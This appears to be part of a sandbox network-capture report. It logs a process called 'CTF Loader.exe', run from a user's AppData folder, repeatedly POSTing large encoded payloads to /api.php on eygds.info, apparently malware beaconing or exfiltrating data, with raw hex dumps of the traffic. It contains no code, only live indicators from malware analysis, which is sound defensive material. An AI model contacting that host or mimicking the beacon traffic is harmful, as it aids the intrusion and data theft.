Dec 30, 2024 01:58:57.213107109 CET	1236	IN	HTTP/1.1 100 Continue Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 6c 61 73 74 2d 6d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 33 30 20 53 65 70 20 32 30 32 31 20 31 32 3a 34 39 3a 30 33 20 47 4d 54 0d 0a 65 74 61 67 3a 20 22 39 39 39 2d 36 31 35 35 62 32 33 66 2d 39 62 31 65 32 64 61 38 31 30 39 64 34 36 64 33 3b 3b 3b 22 0d 0a 61 63 63 65 70 74 2d 72 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 32 34 35 37 0d 0a 64 61 74 65 3a 20 4d 6f 6e 2c 20 33 30 20 44 65 63 20 32 30 32 34 20 30 30 3a 35 38 3a 35 37 20 47 4d 54 0d 0a 73 65 72 76 65 72 3a 20 4c 69 74 65 53 70 65 65 64 0d 0a 70 6c 61 74 66 6f 72 6d 3a 20 68 6f 73 74 69 6e 67 65 72 0d 0a 70 61 6e 65 6c 3a 20 68 70 61 6e 65 6c 0d 0a 0d 0a 3c 21 44 4f 43 54 59 [TRUNCATED] Data Ascii: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100content-type: text/htmllast-modified: Thu, 30 Sep 2021 12:49:03 GMTetag: "999-6155b23f-9b1e2da8109d46d3;;;"accept-ranges: bytescontent-length: 2457date: Mon, 30 Dec 2024 00:58:57 GMTserver: LiteSpeedplatform: hostingerpanel: hpanel<!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { [TRUNCATED]
Dec 30, 2024 01:58:57.213124990 CET	1236	IN	Data Raw: 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 Data Ascii: position: absolute; } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="descript
Dec 30, 2024 01:58:57.213140965 CET	341	IN	Data Raw: 65 64 22 3e 3c 69 6d 67 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 35 30 30 70 78 3b 22 20 73 72 63 3d 22 2f 68 74 64 6f 63 73 5f 65 72 72 6f 72 2f 73 6f 6d 65 74 68 69 6e 67 2d 6c 6f 73 74 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: ed"><img style="width:500px;" src="/htdocs_error/something-lost.png"> <h1>Oops, looks like the page is lost.</h1> <p style="font-size:22px;" class="sub-header text-block-narrow">This is not a fault, just

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	50028	156.67.74.96	80	2756	C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 01:58:56.734987020 CET	281	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 132622 Expect: 100-continue Connection: Keep-Alive
Dec 30, 2024 01:58:57.084436893 CET	12360	OUT	Data Raw: 70 3d 70 68 44 68 54 7a 34 6c 4b 64 71 69 49 61 55 69 41 71 4a 38 25 32 42 57 2f 4b 61 58 4b 50 5a 5a 6f 6e 73 79 4b 74 61 38 52 44 64 32 34 42 69 4c 7a 62 62 72 36 6e 47 6b 71 45 48 35 56 48 6f 4d 34 48 58 45 33 56 69 35 34 70 33 4f 77 4a 32 75 Data Ascii: p=phDhTz4lKdqiIaUiAqJ8%2BW/KaXKPZZonsyKta8RDd24BiLzbbr6nGkqEH5VHoM4HXE3Vi54p3OwJ2u7b1%2BuDbKYThHqXrdRyLAA7O%2B8ein%2BO0CMPBEiYn2RRtaIEBbsfP0YfRNNarEZc9oxWASh1iQjZ3pUh9yjMurmGJ5P3gl8S1YxwSnyegAQedvLEgjgOMA67lum/JMG87OCde36frctmOgvQnUovMamRRP%2B
Dec 30, 2024 01:58:57.089471102 CET	4944	OUT	Data Raw: 51 76 50 31 78 69 75 37 46 33 44 50 6b 33 44 5a 49 74 49 5a 25 32 42 59 56 77 25 32 42 6f 51 35 32 77 6b 78 48 49 39 25 32 42 50 4e 32 64 47 7a 49 75 78 6e 4c 58 64 7a 52 35 47 33 36 44 76 5a 33 33 33 6f 4c 6a 58 72 4b 56 52 75 68 4b 71 4e 6d 4c Data Ascii: QvP1xiu7F3DPk3DZItIZ%2BYVw%2BoQ52wkxHI9%2BPN2dGzIuxnLXdzR5G36DvZ333oLjXrKVRuhKqNmLtqHWX8SVC7wTC17GuDRIm4hXMxovH7qjHO1cNemjqZRFjfOBjq1TEHjA0I1ev5nIxXDyvTR4p5DAo1CZ9QtIaYfvhsL8qTS1NXvso%2BcX2j9LKRwRxs06m8XHjR8TU1Rst%2BRpY6lsPut3FbLHc5xY0PqteK4To
Dec 30, 2024 01:58:57.089502096 CET	7416	OUT	Data Raw: 70 53 44 77 5a 77 63 75 41 33 70 73 37 70 6d 77 4c 64 6d 6f 6a 53 4e 68 65 66 51 50 62 55 59 37 42 68 50 50 4d 6c 56 77 74 73 6b 6d 51 6c 6c 6f 6e 25 32 42 69 51 37 35 34 2f 42 33 52 43 7a 2f 59 55 47 70 34 52 39 4b 69 32 55 31 33 69 6e 56 64 65 Data Ascii: pSDwZwcuA3ps7pmwLdmojSNhefQPbUY7BhPPMlVwtskmQllon%2BiQ754/B3RCz/YUGp4R9Ki2U13inVdecmxVCoOv0LPV81xxe3%2B7Mlo2EPbJA4oSgH6oBWjrdaL78NMTdRwFfeQseq9fV7MT%2BnIR/YUALgAkA5Usuft6qjvTBbJ2KGg7/xHHHS0AbNUUm4CCVrNCfmDQVjPK141d6iOiEJsiTYyHj33mfVif8b9IYdbbk
Dec 30, 2024 01:58:57.089617014 CET	4944	OUT	Data Raw: 58 48 4c 32 4f 56 4a 79 42 76 71 70 73 4f 46 4c 30 64 67 4b 7a 31 43 55 54 33 63 56 68 52 6e 6d 37 32 49 6d 48 42 57 53 53 52 51 69 78 6a 56 55 32 6c 46 79 6e 4b 6b 49 30 5a 7a 42 71 55 64 5a 36 56 50 4a 61 4a 6a 6f 61 58 6e 35 61 45 79 4a 64 37 Data Ascii: XHL2OVJyBvqpsOFL0dgKz1CUT3cVhRnm72ImHBWSSRQixjVU2lFynKkI0ZzBqUdZ6VPJaJjoaXn5aEyJd7b02v5iLmU4GM//QsmRpXFT7n8SLvvS2Oq3MzxLNmpOlcPC2fViHDt6ptCz99jHO1erjoD4NuGaCIRx8jSzbfUyKAog3lpOAT12UUTr8UCdcLXshWLQD3MFRvn%2BEZGcPv9AuBuK2BwdO%2BGEAxhncprvLPQYtw3
Dec 30, 2024 01:58:57.089663029 CET	4944	OUT	Data Raw: 42 45 68 34 77 6a 59 74 6a 5a 68 37 25 32 42 55 74 5a 6e 47 6d 33 78 25 32 42 46 56 58 48 4e 76 39 38 63 6a 6c 46 52 77 4a 76 71 59 4c 63 59 41 34 6d 7a 79 52 68 48 38 25 32 42 35 64 4f 74 72 4a 43 2f 77 45 2f 4c 70 49 49 5a 53 6d 43 4b 2f 68 2f Data Ascii: BEh4wjYtjZh7%2BUtZnGm3x%2BFVXHNv98cjlFRwJvqYLcYA4mzyRhH8%2B5dOtrJC/wE/LpIIZSmCK/h/vHyweiq%2BteKOv7vAkAV0Yl2j%2BxzNo7NFoT0GH71OLqlkHPSPv7yVapBQBI53KgdOs9QcjMFLq2xYoIJloWnObNSYFc/eEGgb2bj76YFiNB691/v3l4Qn07uF0VjCYmyUEjpozjSzw5BN0o%2B//IDxLGcwbFb
Dec 30, 2024 01:58:57.089895964 CET	2472	OUT	Data Raw: 6e 43 42 6b 30 78 54 59 2f 2f 46 6c 78 44 63 71 70 77 6c 63 5a 79 62 58 34 70 44 2f 76 62 25 32 42 36 44 31 78 46 6b 6d 6c 6f 64 49 4a 41 73 65 66 6f 4d 56 52 43 48 31 4d 59 35 4f 71 41 76 65 70 63 6e 78 6d 72 64 71 4b 25 32 42 4a 55 33 41 32 34 Data Ascii: nCBk0xTY//FlxDcqpwlcZybX4pD/vb%2B6D1xFkmlodIJAsefoMVRCH1MY5OqAvepcnxmrdqK%2BJU3A24VZBHgD/rEhlZx4GCCySK1Iz5zA6ETAls7WkGaLUk69M0EiJK7fz2bciQnjMyIThnS2MsIcMu1D4fwBHr50SjeKO63E6QZ7IIU6sZYEssiP%2BRYRX2u31SwrZc0xfI9E0lWVmYkfL%2BnCp7hGQV8VNip7bS8pOzr
Dec 30, 2024 01:58:57.094415903 CET	2472	OUT	Data Raw: 6e 73 74 4a 54 5a 39 78 2f 57 36 4f 67 35 69 54 75 77 6c 44 71 6e 6e 36 4e 36 65 76 30 64 38 65 6f 34 31 45 43 46 44 4a 6c 50 49 36 77 57 4d 58 64 59 38 77 6a 46 2f 42 70 43 41 57 78 7a 78 69 25 32 42 46 49 45 44 51 30 48 4e 44 52 64 68 74 2f 2f Data Ascii: nstJTZ9x/W6Og5iTuwlDqnn6N6ev0d8eo41ECFDJlPI6wWMXdY8wjF/BpCAWxzxi%2BFIEDQ0HNDRdht//ka4PTlMNXzxUNkXliTe6j1203Le7hsIE3/uMCi1fapxr5S%2B4kYjASwZkLRr4wwqZ1hPwhsBDnkxP6nmNwiIJD8NkJT3GgArO/cHUQeXAI/Bbc4CrZ4p8DKhIYQWRVddeAd%2BGjz9/Jl3wGryH2lSo0UuHi4pkV
Dec 30, 2024 01:58:57.094444990 CET	4944	OUT	Data Raw: 31 67 63 34 33 58 63 32 6d 59 4d 77 43 39 62 73 76 4f 4a 55 76 63 37 4c 42 7a 7a 32 7a 41 55 68 66 52 4d 6a 62 4c 4d 79 53 62 42 62 6f 47 62 43 6a 30 45 68 46 74 56 43 25 32 42 35 59 36 4b 30 56 44 51 4c 35 6f 6b 34 33 78 36 66 70 4d 46 6c 69 55 Data Ascii: 1gc43Xc2mYMwC9bsvOJUvc7LBzz2zAUhfRMjbLMySbBboGbCj0EhFtVC%2B5Y6K0VDQL5ok43x6fpMFliUG51L385y1WgOf6y6gFR%2BB15OBbyneJ0SE1PbIXtCyzGZTMHtv2OzMIy30cNzaPUu0fQJnSGXNLFMTIR4IfGAuDqDHfcJtBpCbCyf8qn2rhMTPTK5Wv8vhXuU2jRkhluo%2BnoSrlPfS7d%2BNM3GxargMWr/3yS
Dec 30, 2024 01:58:57.094470978 CET	2472	OUT	Data Raw: 38 6e 32 73 30 4f 30 34 44 39 37 33 51 36 73 54 4a 49 75 70 48 53 44 65 4a 6e 5a 6b 6d 5a 65 50 56 66 74 6d 43 31 63 38 62 66 37 4b 6a 50 43 38 55 66 58 6f 4f 77 49 6a 75 6e 5a 58 4e 4d 4a 61 78 4d 30 6d 79 74 77 44 59 6e 4f 65 6d 52 6c 61 5a 57 Data Ascii: 8n2s0O04D973Q6sTJIupHSDeJnZkmZePVftmC1c8bf7KjPC8UfXoOwIjunZXNMJaxM0mytwDYnOemRlaZWhGkDSzGNIU7K4FHxFoKHGK6AaYW6wikvrHDkZ8Put0FEBlXtgOGR1pq2UJWdbv9MBmk%2BNt6rKt1BgHspAh3kCOFoHQAHeP1QGVdHxiKtzRqOPh0AB3j9UBlXR8Yirc0ajj4dAAd4/VAZV0fGIq3NGo4%2B%2Bn2
Dec 30, 2024 01:58:57.094515085 CET	2472	OUT	Data Raw: 6f 6e 43 62 53 69 30 73 6e 37 32 7a 65 43 79 32 54 62 71 6b 51 77 46 73 62 58 59 33 79 6c 76 56 52 58 62 71 4b 77 37 41 74 66 6f 4b 43 4e 39 66 36 75 4b 49 49 30 4f 54 56 47 65 4c 63 58 6f 6a 30 48 67 4b 62 67 79 6f 4c 57 36 64 62 35 55 6a 38 4a Data Ascii: onCbSi0sn72zeCy2TbqkQwFsbXY3ylvVRXbqKw7AtfoKCN9f6uKII0OTVGeLcXoj0HgKbgyoLW6db5Uj8JMi3yONbY1lTWt6rf2K8Wqga1aCGYToBChL3bx7KY37bGKlFc9czU5nHhMLPPJt5upXGoOvOMiuTg25h3unEIiL67grSmvv2A6HxWnuWkmaMgsZCZ4MBXIIiHFaUANmc8bnJ06BbAEkWVGNUokHOtCGOnN6TSbOVMK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	50029	156.67.74.96	80	2756	C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 01:59:22.905179977 CET	254	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 286 Expect: 100-continue
Dec 30, 2024 01:59:23.258965015 CET	286	OUT	Data Raw: 70 3d 32 71 48 30 4b 42 48 48 6c 70 4d 72 49 79 6b 47 2f 59 56 69 37 4a 56 31 25 32 42 25 32 42 45 37 71 41 77 32 37 52 72 62 56 7a 39 54 36 45 33 38 52 5a 33 48 57 59 7a 5a 75 6c 70 35 43 66 6c 6f 72 66 45 4a 58 63 47 66 49 54 6c 2f 74 48 35 33 Data Ascii: p=2qH0KBHHlpMrIykG/YVi7JV1%2B%2BE7qAw27RrbVz9T6E38RZ3HWYzZulp5CflorfEJXcGfITl/tH53qbP3ybh%2B5R%2BoQfDJYdxY%2BLeL4CfPUNjeMyQYy%2BhznJ/iR%2B8EfLeOyp5yqnHAxQIhLcFZI8Mkffz42B7krq2u7OXqqle7sxfGYqM4gionehlh7cV962TIKR3V7cktRe%2BNwMtZWMxPYK2AGL8riBZtj
Dec 30, 2024 01:59:23.458260059 CET	1236	IN	HTTP/1.1 100 Continue Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 6c 61 73 74 2d 6d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 33 30 20 53 65 70 20 32 30 32 31 20 31 32 3a 34 39 3a 30 33 20 47 4d 54 0d 0a 65 74 61 67 3a 20 22 39 39 39 2d 36 31 35 35 62 32 33 66 2d 39 62 31 65 32 64 61 38 31 30 39 64 34 36 64 33 3b 3b 3b 22 0d 0a 61 63 63 65 70 74 2d 72 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 32 34 35 37 0d 0a 64 61 74 65 3a 20 4d 6f 6e 2c 20 33 30 20 44 65 63 20 32 30 32 34 20 30 30 3a 35 39 3a 32 33 20 47 4d 54 0d 0a 73 65 72 76 65 72 3a 20 4c 69 74 65 53 70 65 65 64 0d 0a 70 6c 61 74 66 6f 72 6d 3a 20 68 6f 73 74 69 6e 67 65 72 0d 0a 70 61 6e 65 6c 3a 20 68 70 61 6e 65 6c 0d 0a 0d 0a 3c 21 44 4f 43 54 59 [TRUNCATED] Data Ascii: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100content-type: text/htmllast-modified: Thu, 30 Sep 2021 12:49:03 GMTetag: "999-6155b23f-9b1e2da8109d46d3;;;"accept-ranges: bytescontent-length: 2457date: Mon, 30 Dec 2024 00:59:23 GMTserver: LiteSpeedplatform: hostingerpanel: hpanel<!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { [TRUNCATED]
Dec 30, 2024 01:59:23.458271980 CET	1236	IN	Data Raw: 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 Data Ascii: position: absolute; } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="descript
Dec 30, 2024 01:59:23.458281994 CET	341	IN	Data Raw: 65 64 22 3e 3c 69 6d 67 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 35 30 30 70 78 3b 22 20 73 72 63 3d 22 2f 68 74 64 6f 63 73 5f 65 72 72 6f 72 2f 73 6f 6d 65 74 68 69 6e 67 2d 6c 6f 73 74 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: ed"><img style="width:500px;" src="/htdocs_error/something-lost.png"> <h1>Oops, looks like the page is lost.</h1> <p style="font-size:22px;" class="sub-header text-block-narrow">This is not a fault, just

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	50030	156.67.74.96	80	2756	C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 01:59:22.906426907 CET	254	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 318 Expect: 100-continue
Dec 30, 2024 01:59:23.258961916 CET	318	OUT	Data Raw: 70 3d 53 50 74 31 6f 66 78 74 4b 32 44 43 4d 33 76 36 48 52 54 61 63 6d 33 63 4e 6b 70 59 32 6f 30 74 64 45 33 70 58 52 25 32 42 69 6e 4d 7a 59 62 6c 48 35 41 74 35 59 38 62 56 30 72 41 69 44 59 37 4d 46 68 34 79 5a 7a 2f 55 6b 4a 45 44 6e 73 48 Data Ascii: p=SPt1ofxtK2DCM3v6HRTacm3cNkpY2o0tdE3pXR%2BinMzYblH5At5Y8bV0rAiDY7MFh4yZz/UkJEDnsHiWnAK5VejmZXtsIuHcXQAkjgl9M3Y8DT47/qY3yAk6aCWwwi02LX4Yb/0Zd93ojmhbn3r3ad0Il0nvMjTt02Pe9RI5K5tzpxNMU6meKEHoOH%2BCCrwJE9NzmCefLQuoszSDLx8X8KJFwaeHhu7wW7bvMn83umqay
Dec 30, 2024 01:59:23.447031975 CET	25	IN	HTTP/1.1 100 Continue
Dec 30, 2024 01:59:23.447185993 CET	1236	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 content-type: text/html last-modified: Thu, 30 Sep 2021 12:49:03 GMT etag: "999-6155b23f-9b1e2da8109d46d3;;;" accept-ranges: bytes content-length: 2457 date: Mon, 30 Dec 2024 00:59:23 GMT server: LiteSpeed platform: hostinger panel: hpanel Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute;
Dec 30, 2024 01:59:23.447196960 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 Data Ascii: } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="description" content="Oops, looks
Dec 30, 2024 01:59:23.447211027 CET	316	IN	Data Raw: 70 78 3b 22 20 73 72 63 3d 22 2f 68 74 64 6f 63 73 5f 65 72 72 6f 72 2f 73 6f 6d 65 74 68 69 6e 67 2d 6c 6f 73 74 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 4f 6f 70 73 2c 20 6c 6f 6f 6b 73 20 6c Data Ascii: px;" src="/htdocs_error/something-lost.png"> <h1>Oops, looks like the page is lost.</h1> <p style="font-size:22px;" class="sub-header text-block-narrow">This is not a fault, just an accident that was not

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	50031	156.67.74.96	80	2756	C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 01:59:22.969342947 CET	281	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 124714 Expect: 100-continue Connection: Keep-Alive
Dec 30, 2024 01:59:23.318744898 CET	12360	OUT	Data Raw: 70 3d 70 68 44 68 54 7a 34 6c 4b 64 71 69 49 61 55 69 41 71 4a 38 25 32 42 57 2f 4b 61 58 4b 50 5a 5a 6f 6e 73 79 4b 74 61 38 52 44 64 32 34 42 69 4c 7a 62 62 72 36 6e 47 6b 71 45 48 35 56 48 6f 4d 34 48 58 45 33 56 69 35 34 70 33 4f 77 4a 32 75 Data Ascii: p=phDhTz4lKdqiIaUiAqJ8%2BW/KaXKPZZonsyKta8RDd24BiLzbbr6nGkqEH5VHoM4HXE3Vi54p3OwJ2u7b1%2BuDbKYThHqXrdRyUTjxHSdd7usCJmao7jUKD2RRtaIEBbsfP0YfRNNarEZc9oxWASh1iQjZ3pUh9yjMurmGJ5P3gl8S1YxwSnyegAQedvLEgjgOMA67lum/JMG87OCde36frctmOgvQnUovMamRRP%2BSSdu
Dec 30, 2024 01:59:23.323705912 CET	14832	OUT	Data Raw: 52 45 32 7a 54 6c 5a 6e 36 25 32 42 6b 31 42 35 30 65 47 48 63 4a 36 53 62 55 47 73 4b 48 78 33 59 4c 47 6f 36 44 72 68 73 31 70 41 4d 37 6c 33 78 4c 5a 58 73 59 46 34 6a 53 65 61 31 4b 61 4d 51 45 70 65 25 32 42 49 57 56 6c 4a 53 4a 43 44 4e 6b Data Ascii: RE2zTlZn6%2Bk1B50eGHcJ6SbUGsKHx3YLGo6Drhs1pAM7l3xLZXsYF4jSea1KaMQEpe%2BIWVlJSJCDNkzc8ymnYC0CSE%2BC3lC2KxPIxHiSf6tGi2YljQfXN%2BUqfcWlDFtovcKoymuLR9oHKST4A%2BUGhMPK6eX%2Bo/tvbjxfcC4fMwi7hI9Df3Au9bgNcpqdY9B9l0jbmUkXVUBD9DCWF5ir7LplYu6/YP9PYPlGcyZ
Dec 30, 2024 01:59:23.323795080 CET	4944	OUT	Data Raw: 35 4c 45 39 45 79 44 37 78 71 37 6d 71 36 6e 44 37 49 76 58 72 5a 57 56 76 54 74 36 67 55 42 4e 69 4e 57 6c 56 68 46 45 64 47 32 45 42 72 32 36 45 53 66 37 45 37 42 72 68 37 54 48 6c 44 72 35 73 78 32 68 77 6a 61 4d 39 61 62 42 63 72 68 58 49 4f Data Ascii: 5LE9EyD7xq7mq6nD7IvXrZWVvTt6gUBNiNWlVhFEdG2EBr26ESf7E7Brh7THlDr5sx2hwjaM9abBcrhXIO9%2B8F0mN4lh1rtxeIn9srlH2d/ONvnuUmzbfmbCoZR/1F/Fk/uyFxvfCtvla0zZAoUZ3F/noCw9knjnDoZz16RDWPBjIeKm8/yb5DK0BXMCfedk534Ell4qDKJuPCqRSBY9Bmn6kq04i%2B1O4qY0F/Fq34KEs%2
Dec 30, 2024 01:59:23.323823929 CET	2472	OUT	Data Raw: 51 33 4e 4b 25 32 42 25 32 42 54 68 4a 56 72 37 6a 38 41 48 30 56 7a 6e 33 41 75 41 59 6a 52 59 70 7a 58 77 41 48 73 45 55 56 33 48 56 68 4a 6d 62 46 6f 70 78 63 75 78 79 31 53 45 25 32 42 68 34 6c 6c 67 63 74 67 47 41 79 7a 65 50 45 66 38 42 74 Data Ascii: Q3NK%2B%2BThJVr7j8AH0Vzn3AuAYjRYpzXwAHsEUV3HVhJmbFopxcuxy1SE%2Bh4llgctgGAyzePEf8BtEauEfu9IVgVvBSqfa7WT265U6MnOaRIkUMY1Sxqr4XuYpwU%2BQY7E9CczNWdF7cKsh60/osQ6N1LVK2ijr/PT9V8/1H2Oj6E9Yl1UFVJakl3GDzO87QB/Sf05iQ5hqbcnMKi%2Bm%2B8ets5m%2BJUa/Dr7ko1jI
